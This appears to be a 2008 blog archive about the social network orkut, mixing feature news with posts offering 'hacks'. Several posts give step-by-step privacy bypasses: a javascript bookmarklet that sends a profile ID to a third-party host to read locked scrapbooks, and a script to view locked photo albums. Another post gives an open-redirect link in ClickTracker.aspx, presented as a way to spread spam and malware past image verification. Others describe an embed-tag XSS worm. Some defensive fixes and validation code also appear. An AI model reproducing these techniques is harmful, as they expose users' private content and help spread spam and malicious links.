Friday, February 15, 2008

New Attack on orkut! User gets logged out by just opening scrapbook!

Hackers have discovered the most serious bug on orkut yet, and that too in orkut’s most accessed area - the scrapbook!

What makes it most serious is that this time the user does not need to click or perform any action anywhere to trigger the vulnerable code.

Many users suffered from this. Most of them are getting logged out of orkut just by visiting their own scrapbook. Worse, they cannot delete blank or suspicious scraps either! :-(

The bug is not fixed yet and it can be used by malicious hackers to gain access to victims’ orkut accounts, so details about this bug will be posted after it gets rectified. Till then, let’s use the following solution to protect yourself!

Objective: Blocking flash content [on orkut at least]

#Firefox User:

Flashblock

#Internet Explorer:

  • Go to the Tools Menu -> Internet Options
  • Click on the Security tab
  • Click on Custom Level
  • Disable Run ActiveX controls and plug-ins


Additionally, delete scraps from your scrapbook if you are getting logged out of orkut just by visiting your own scrapbook!

Thanks to Kee Hinckley for the timely post on the issue!



Beginners Guide To OpenSocial & Orkut Sandbox! [covering FAQ]

Many orkut users asked me various questions about orkut sandbox via scrapbook, comments, community, email & other media after I published 3 ways to read locked scrapbook on orkut! In this post, I will try to clear your doubts on orkut sandbox and OpenSocial.

#What is OpenSocial?

From wikipedia,

OpenSocial is a set of common application programming interfaces (APIs) for web-based social network applications, developed by Google, and released November 1, 2007. Applications implementing the OpenSocial APIs will be interoperable with any social network system that supports them, including features on sites such as MySpace and Friendster.

Except facebook, almost all social networking sites are using OpenSocial. This means you can safely assume that if you write an application for orkut using the OpenSocial API, it will work on other sites (like MySpace, LinkedIn, etc.) almost without change! :-)

#What is orkut sandbox?

First let’s get the relevant definition of sandbox from Wikipedia

"The term sandbox is commonly used in the development of Web services to refer to a mirrored production environment for use by external developers. Typically, a third-party developer will develop and create an application that will use a web service from the sandbox, which is used to allow third-party team to validate their code before migrating it to the production environment"

So think of Orkut Sandbox as an orkut mirror where you can write applications using the OpenSocial API. It’s like creating a fake orkut account to test a new orkut hack. Think of sandbox as a fake profile with some features added/removed and created by orkut itself for you to test applications!

#Cool… How to signup for orkut sandbox?

By default sandbox access is disabled for an orkut account. You can request access to the sandbox using the orkut sandbox sign up form. Sandbox access is completely free and requires you to have an orkut account beforehand.

After submitting the sign-up form you get a mail from Google (normally in 2-3 days) indicating the status of your request.

#How to access sandbox? Where is it?

Sandbox is an extension to your existing orkut account! After receiving the confirmation mail from Google you can just log on to http://sandbox.orkut.com to enter the sandbox. You can also modify any orkut page’s URL to get its view from the sandbox.

Example

http://www.orkut.com/scrapbook.aspx?uid=[some_num]

will become..

http://sandbox.orkut.com/scrapbook.aspx?uid=[some_num]

This URL change resulted in the scrapbook hack which enabled people to read locked scrapbooks via the sandbox!

#Sandbox Limitation

OpenSocial API calls will operate on sandbox-whitelisted friends only. This means that to test your applications you need either your friends to gain sandbox access, or to add people who already have sandbox access as friends. There is an orkut sandbox community where you can find people with sandbox access and add them.

This limitation is enforced for security reasons as explained by Arne Roomann-Kurrik!

Also, private information like email addresses of users cannot be accessed! So spammers, do not think about sandbox as a way for your evil intentions :-)

#Resources

If you are not familiar with words like sandbox and API, use the following Wikipedia links…

Best starting point for developers…

Worth bookmarking….

Finally if you need to communicate…

Let me know if I missed anything! :-)



Orkut Scrapbook XSS Bug is Still Active!

Two days after we posted about the scrapbook bug, and after demonstrations of its destructiveness by Rodrigo Lacerda (Portuguese link) and Jerry, it looks like the orkut team hasn’t had enough of it!

So on the request of some of the members, and also to force orkut to take this more seriously, we are partially revealing the bug…

The bug is in the embed tag’s src attribute! Orkut doesn’t validate whether src points to a valid flash media file URL, and thus any URL submitted as the value of the src attribute just gets executed when a user opens the scrapbook! This is different from most infections, where the user has to generate some event like clicking on a particular region, link, etc.

Proof of Concept 1:

Here is harmless but highly annoying code which you can put in your friend’s orkut scrapbook. This is the reason why some people were getting logged out of orkut just by visiting their scrapbook!

Code:

Proof of Concept 2:

A more serious but harmless exploitation is a worm created by Rodrigo Lacerda (Portuguese link), which performs the following routine.

  • You read the scrap with the code (in fact, you just open the scrapbook with the code)
  • The code injects JavaScript in your browser
  • The JavaScript code makes you join the community
  • Then the code collects your list of friends
  • It sends the scrap with the code to them!

The community which is being joined is Infectados pelo Vírus do Orkut! Just check out the community page and reload it. Look how fast the number of members increases. :-)

Solution:

The solution is the Flashblock extension we talked about in earlier posts!

What should orkut do:

  • They should first activate CAPTCHA (i.e. image verification) for all URLs, including their own. That way the worm will stop spreading itself!
  • For the future, they should validate user input properly. XSS is most of the time the result of improper validation of input. Like here, they haven’t checked the URL for filetype!
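
The input validation suggested in the second point can be backed by an audit over stored scraps like the one below, an added example that is not from the original post or from orkut. It flags embed tags whose src is not an absolute http(s) URL with a .swf path; the function names and the exact .swf rule are assumptions made for illustration.

```javascript
// Added example: triage stored scrap HTML for <embed> tags whose src is not
// an absolute http(s) URL ending in .swf (the "filetype" check the post asks for).
// This is an audit pass; enforcement at write time should use a real HTML parser.

// Pull attributes out of one tag; handles "double", 'single' and unquoted values.
function parseAttributes(tag) {
  const attrs = {};
  const re = /([a-zA-Z_:][-\w:.]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  let m;
  while ((m = re.exec(tag)) !== null) {
    const name = m[1].toLowerCase();
    // First occurrence of a duplicated attribute wins, as in browsers.
    if (!(name in attrs)) attrs[name] = m[2] ?? m[3] ?? m[4] ?? "";
  }
  return attrs;
}

// Return null when src is acceptable, otherwise the reason it is rejected.
function rejectReason(src) {
  if (src === undefined || src.trim() === "") return "missing src";
  let url;
  try {
    // No base URL: relative and scheme-relative ("//host/...") values fail here.
    url = new URL(src.trim());
  } catch {
    return "not an absolute URL";
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") {
    return "scheme " + url.protocol;
  }
  // Test the parsed path, so "?f=a.swf" or "#a.swf" cannot satisfy the rule.
  if (!url.pathname.toLowerCase().endsWith(".swf")) {
    return "path is not a .swf file";
  }
  return null;
}

// Return one finding per <embed> tag in the scrap that fails the check.
function auditScrap(html) {
  const findings = [];
  for (const m of html.matchAll(/<embed\b[^>]*>/gi)) {
    const reason = rejectReason(parseAttributes(m[0]).src);
    if (reason) findings.push({ tag: m[0], reason });
  }
  return findings;
}
```

A file extension is only a first filter: the scrap should still be rejected or rewritten at submission time, since the browser will request whatever URL is stored.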

Update: Orkut, in an official blog post, claims to have fixed the bug! But this embed tag bug is still open! They might have fixed another bug which Rodrigo used!

Link: Post by Rodrigo Lacerda (in Portuguese ) | Flash Block Solution | Jerry post | Orkut’s official blog post



Now You Can Have Your Orkut Profile in Google Search!

Yep. Soon Google crawlers will be indexing orkut profiles and everyone on orkut will be googlable. In simple terms, you can use google search to find your friends’ orkut profiles and your friends can do the same to find you!

Although there is no official post regarding this on any Google or Orkut official blog, a new privacy setting - "orkut in google search results", indicates just this.


By default this setting is configured to show your orkut information in search results! That’s why you don’t need to do anything to appear in google search.

Those who are concerned about privacy can choose the "hide information" option. There is no fine-grained control like facebook provides. So better opt for hiding if you have doubts about how this feature will be used (or abused).

Three months back facebook opened their user database to search engines, and considering that move by facebook, this should not surprise anyone.

Also can orkut do this as sensibly as facebook did?

Related: Read how facebook did that!



Orkut Viewing Locked Scrapbook Hack is Back!

Important Update: This hack is rectified by orkut. SO IT WILL NOT WORK ANYMORE. If I find a new hack I will definitely post it here!

You may subscribe to my RSS feed or email alert to receive automatic updates regarding this and other hacks in future! (Jan 3, 2008)


Yep! For those who missed the old orkut hack to view locked scrapbooks, a new hack to do the same is here!


#Steps to use this hack…

  • Navigate to the profile with the locked scrapbook or to the locked scrapbook itself.
  • Now you will see the Profile ID in the address / navigation bar. Ex. In http://www.orkut.com/Profile.aspx?uid=10226448830416481862 , 10226448830416481862 is the Profile ID. Note down this Profile ID.
  • Now replace ProfileID in the following textbox with the Profile ID you noted above.
  • http://x13.110mb.com/scraps.php?uid=ProfileID
  • So with Profile ID 10226448830416481862, it becomes http://x13.110mb.com/scraps.php?uid=10226448830416481862
  • Finally copy everything from the text box and paste it in the address bar. Hit ENTER and you will get the scraps.

#Alternate way… (Javascript)

  • Navigate to the profile with locked scrapbook or locked scrapbook itself.
  • Paste Following javascript in address bar and hit ENTER.

javascript:var dw = document.location.href; dw = dw.split('=');document.location='http://x13.110mb.com/scraps.php?uid='+dw[1];

#Alternate way… (For Firefox Only)

You can drag-n-drop the following bookmarklet onto your browser’s bookmark toolbar. That will create a bookmark named "UNLOCK SCRAPBOOK". Just click on it whenever you encounter any locked scrapbook and you will be redirected to the unlocked scrapbook automatically…

Unlock Scrapbook

Looks like a bad start for orkut in 2008. Thanks Jerry!

Also check out View Photos from Locked Orkut Album!



Organize Photos into Album on Orkut - New Feature!

After revising photo upload limits to 100, the next thing everyone wanted was a way to manage photos nicely! Orkut answered your call and now you can group your photos into different albums like my vacation album, new year party pics, birthday snaps, …

So when you click photos link now you will see following…

image

Just choose a title and description, your album will be ready. Next you will be taken to screen where you can upload pics into it! Uploading is the same old process. I was expecting a java applet like facebook provides.

Final album will look like this…

image

After creating an album, the things you can customize anytime are

  • Album cover
  • Name of album i.e. title
  • Album description
  • Of course photos inside album!

One feature orkut should have given is moving photos between albums. As of now, if you have uploaded lots of photos on orkut on different topics, you cannot just move them into different albums. You have to download them to your hard drive first, then upload them again to a different album!

Anyway something nice from orkut after their scrapbook and album hacks!

Related: Official Orkut Blog Post



View Locked Orkut Album in Orkut Style!

Important Update: This hack is rectified by orkut. SO IT WILL NOT WORK ANYMORE. If I find a new hack I will definitely post it here!

You may subscribe to my RSS feed or email alert to receive automatic updates regarding this and other hacks in future! (Jan 17, 2008)


This is the highly recommended way of exploiting the Orkut album hack to unlock (view) pics in the album!

View_locked_orkut_album

Many users claimed that our old orkut album hack is not working. While we noticed a few exceptions, most of the users had trouble copying and pasting the lengthy javascript code. So here comes an automated way - a GreaseMonkey script!

Once you install the above script successfully, the next time you go to any locked orkut album you will see pics from the locked album in orkut style, along with the error message, which has obviously lost its meaning! (See screenshot above)

#How to Install (Need to do this only once!)

That’s it! All locks will be broken automatically as if they never existed! :D

#Credits:

Thanks to Leandro Koiti Sato for creating this script. The original script is here. We made a small change in our version to give maximum results to our users!

Thanks Bean for notifying about script! :-)



Auto-Confirm Friend Requests on Orkut!

This is one of the oldest scripts I have created and used on Orkut. Only today I came to know that I never posted about it!

Anyway, technically it’s the simplest script I have ever written.

#What it does?

Whenever you add someone to your friend list on orkut or approve any pending friend request, orkut takes you to a confirmation page showing two options!

Case 1: Adding someone to your friend List!

Orkut_Add_friend

Case 2: Accepting a pending friend request!

Orkut_accept_friend

Now all this script does is click the send button in Case 1 and the accept button in Case 2, thus automatically confirming the action and redirecting you to the next page!

Installation:

OR

Related Scripts:

  • Pending Friend Request Deleter: This script deletes all pending friend requests in your orkut account! You will need this if you have too many pending friend requests!


Bypassing Orkuts Image Verification while Sending Images!


Many users of Scrap All Script had a problem sending images with the script! The problem is that if you have an image hosted on a third-party server, orkut turns on image verification (called CAPTCHA), which the script cannot bypass!

So here are the steps to bypass orkut’s image verification while sending images…

  1. Save the image on your PC first. (If the image is located somewhere else online, download it to your PC)
  2. Go to any orkut scrapbook. There is an add photo button beside the post scrap button
  3. Click on the add photo button there. That will open a wizard to add a photo to the scrapbook, as shown in the screenshot below.
  4. Click the Browse button and select the image from your PC.
  5. Next click the Upload Picture button.
  6. When uploading is done you will see a URL in the scrapbook text box.
  7. Copy the above URL and paste it in the Scrap All script’s text area. The image will be sent without any problem.

orkut_add_photo_to_scrapbook

Also, next time while scrapping you can click on the Picasa Web Albums link directly, as shown in the above screenshot, to insert images directly from Google’s server. Every image you send this way is saved online in Picasa Web Albums.

Image verification is gone because your image is hosted on Google’s server. Please do not confuse this with breaking of orkut CAPTCHA or breaking of image verification. :-)

Related Link: Scrap All Script - Send a scrap to all orkut friend with one click!


Trick to Find All Communities Owned by Any Orkut User!

Yep. It’s a tricky job to find all communities owned by any orkut user! When you go to any orkut user’s profile, it shows communities joined by that user as well as mutual communities. But there is no direct way to find the communities owned by an orkut user.

So you need to use the following trick…

  1. Navigate to the profile of the orkut user whose communities you want to find
  2. Paste the following code into the address bar and hit enter

javascript:nb=document.all[0].innerHTML.match(/[0-9]*.jpg\)/g);nb=parseInt(nb);window.location.href="http://www.orkut.com/UniversalSearch.aspx?searchFor=C&q="+nb;

The above code will take you to a community search page where you will see the list of communities owned by the above user (step 1)

Communities Owned by A Orkut User

Thanks to Arunim and Mr Nobody who discovered this trick. (via Jerry)


Orkut Script: One-Click Scrapbook, Album & Add to Friend-List Links!

This script is to ease orkut navigation. It basically adds three hyperlinked letters near every profile link:

  • [S] for Scrapbook Link
  • [A] for Album Link
  • [F] for Add to Friend List Link

Here is the screenshot…

Orkut_Easy_Navigation_links

It may look a little bit cluttered, but I have been using this script for more than a year. The only thing is I forgot to post about it on this blog.

Unlike other scripts, which open a pop-up containing scrapbook, album and other useful links whenever you right click on any image linking to an orkut user’s profile, this script doesn’t show any popup! Also, as you may have noticed, it takes only one click to open any user’s scrapbook, album and friend request page.

Installation:

OR

Helper Script: Auto Confirm friend request - Highly useful with [F] links generated by this script. More details are here.


New Orkut Bug Let Spammer Send Any Link Without Image Verification! (Orkut Loves SPAM)

Not so long back, bugs in orkut’s privacy features made users’ scrapbook & album content accessible to everyone no matter what privacy settings they chose. The orkut team fixed those bugs, but unfortunately they will have to cancel their holiday plans, if any, as a new bug has been discovered in orkut which lets spammers send any link without filling in the captcha (image verification). All this means more sCrap all spam on orkut!

#proof of concept:

Paste the following code in any scrapbook…

http://www.orkut.com/ClickTracker.aspx?url=//////www.devilsworkshop.org

A link will be sent which, on clicking, will take you to this blog’s homepage!

Well, you may think the link looks confusing, so the end user may not click on it…

Ok.. What about following code…

Devils workshop

How many of you look at the browser status bar when clicking a link? ;-)

#How to (ab)use!

To send a link, all you need to do is copy the following code and append any URL without http:// to it. (Do not remove any slashes…)

http://www.orkut.com/ClickTracker.aspx?url=//////

#How this bug can be abused?

  • Scrap All Script: Spammers’ most favorite & most powerful tool against orkut is the Scrap All script!
  • To spread Trojans, viruses, spyware, worms, etc.: www.devilsworkshop.org can be replaced by a link to malicious content

Old orkut users may remember that in the past, the spreading of worms via scrapbook was one of the reasons orkut came up with captcha (image verification) while sending third-party links! What is the use of captcha if it can be bypassed!

#Bug Details

  • Bug is in ClickTracker.aspx (URL: http://www.orkut.com/ClickTracker.aspx ).

#A simple fix Orkut can do..

Put an if-else block at the beginning of ClickTracker.aspx which checks the url parameter for third-party domains (i.e. anything other than orkut.com or google.com). If a third-party domain is found, call the captcha routine or just abort the execution.
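
One way to write that check, as an added example that is not orkut’s code or part of the original post: the value of url is resolved the way a browser resolves a redirect target, so the `//////` form is recognised as a third-party host before the domain test runs. The function names and return labels are assumptions; the trusted domains are the two named above.

```javascript
// Added example. Trusted domains follow the post ("orkut.com or google.com").
const TRUSTED_DOMAINS = ["orkut.com", "google.com"];
const ENDPOINT = "http://www.orkut.com/ClickTracker.aspx";

// True when host is a trusted domain or a subdomain of one.
// Matching on ".domain" stops "orkut.com.evil.example" and "notorkut.com".
function isTrustedHost(host) {
  const h = host.toLowerCase().replace(/\.$/, "");
  return TRUSTED_DOMAINS.some((d) => h === d || h.endsWith("." + d));
}

// Classify the already-decoded value of the url parameter.
// "internal" -> redirect; "external" -> captcha or abort; "invalid" -> abort.
function classifyTarget(rawTarget) {
  if (typeof rawTarget !== "string" || rawTarget.trim() === "") return "invalid";
  let resolved;
  try {
    // Resolve against the endpoint exactly as a browser resolves a redirect:
    // for http(s) the URL parser skips extra slashes and treats "\" as "/",
    // so "//////host" and "\\host" both become an absolute URL on "host".
    resolved = new URL(rawTarget, ENDPOINT);
  } catch {
    return "invalid";
  }
  if (resolved.protocol !== "http:" && resolved.protocol !== "https:") {
    return "invalid";
  }
  // Embedded credentials ("user@host") are never needed for a first-party link.
  if (resolved.username || resolved.password) return "external";
  return isTrustedHost(resolved.hostname) ? "internal" : "external";
}

// Entry point for a full request URL, as the handler would see it.
function classifyRequest(requestUrl) {
  const target = new URL(requestUrl).searchParams.get("url");
  return classifyTarget(target === null ? "" : target);
}
```

The decision is made on the parsed hostname, never on a prefix or substring of the raw parameter, which is what the extra slashes defeat.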

That’s it! Thanks to Jerry for the bug and for reporting this in the orkut google-group! If you are a google-group user, please post a reply in this thread so that it gets noticed by the orkut team sooner!


Orkut Added Community Privacy Feature!

After orkut’s privacy features for profile content, now comes the turn of orkut communities.

Yes, now you can have private communities on orkut where all discussions, polls and events will be secret from non-community members.

The feature can be used by all community owners by going to the edit profile community link. The Edit community page now has a new setting - content privacy … (as shown below)

image

If you choose the hidden option, content from your community will no longer be shown to non-members. I guess a better approach would have been to hide the entire community itself from directory listings as well as the orkut search engine.

Finally, a note for all dark-minded people… Wait before jumping out of your chair, as orkut can and will monitor the content of these secret communities! In fact, secret communities should be monitored more… ;-)

Related: Hide Orkut Scrapbook from Strangers


Orkut Showing Last Login Info to Secure Users!

Orkut has started showing information about the last login on the user’s orkut home page!

This is particularly good for protecting yourself from attackers who steal your login information but, instead of deleting or making any changes to your account, just monitor your private information. This is a more serious threat with email accounts, as everything in your mailbox is personal. On orkut, an attacker who has access to your account can still do the following things without getting noticed…

  • Download your contact book
  • Read orkut messages
  • Check private albums/videos
  • Read profile information (like cell phone numbers) which you may limit to your friends

I do not think many people use orkut’s messaging feature. Also, the last two can be exposed to attackers who have managed to crack, if not your account, your friend’s account!

Still, this is a really good move, considering that an attacker who is monitoring your account today may get pissed off at you and delete your account. Worse, they may change your account’s login info and, worst of all, spam your friends with malicious scraps, thus damaging your social image!

So my advice to you is to keep checking this last login info and, whenever in doubt about the last login time, change your orkut account password without wasting any more time!

Related: Orkut Security Tips


Orkut Confirming Clicks on Outgoing Links!

Orkut Confirm Click on Outgoing Links

One more security, or rather annoying, feature added by orkut is confirming clicks on outgoing links. As shown in the above screenshot, if you now click on any link that takes you away from orkut, you need to go through a confirmation procedure!

With the bug in orkut’s own Click Tracker program, features like these will end up just annoying orkut users. Worse, users may take this for granted and end up being more vulnerable.

What will happen if a malicious link is sent using a bug like the one in orkut’s very own Click Tracker program? The link will not be categorized as an outbound one, so no confirmation box will pop up!

This is where a user will be at risk, as she may falsely assume that no confirmation box means no threat! :O

So to the orkut team: please stop patch-working like this and do things more sensibly.

Related: Bug in Orkuts Click Tracker Program


Orkuts New Friends Finder - Find Friends From Any Email Account!

A few months back orkut added a facebook-like friends finder. Using that friend finder you could find & invite all your Gmail friends on orkut without much work. We and many others at that time wished orkut had done it the facebook way and made the friend finder work with any email account. Looks like the orkut team listened to our calls and came up with a new improved friends finder.

Orkut New Friends Finder

As shown in the screenshot, now you can also add friends from Hotmail, Yahoo & AOL!

The "find friends" box can be seen in the left sidebar on your orkut home page. If you have never used this feature in the past, be sure to read the orkut friend finder guide!

One more thing: some of my friends haven’t seen this new friend finder on their account yet. I guess, like many other features in the past, orkut is rolling this out slowly. So it may take a day or two for this feature to get activated on your account! :-)

Author’s Note: This is my 100th post on Orkut. It’s always a pleasure to write for you. Thanks for your love and support. Hope to receive the same in future too! :-)
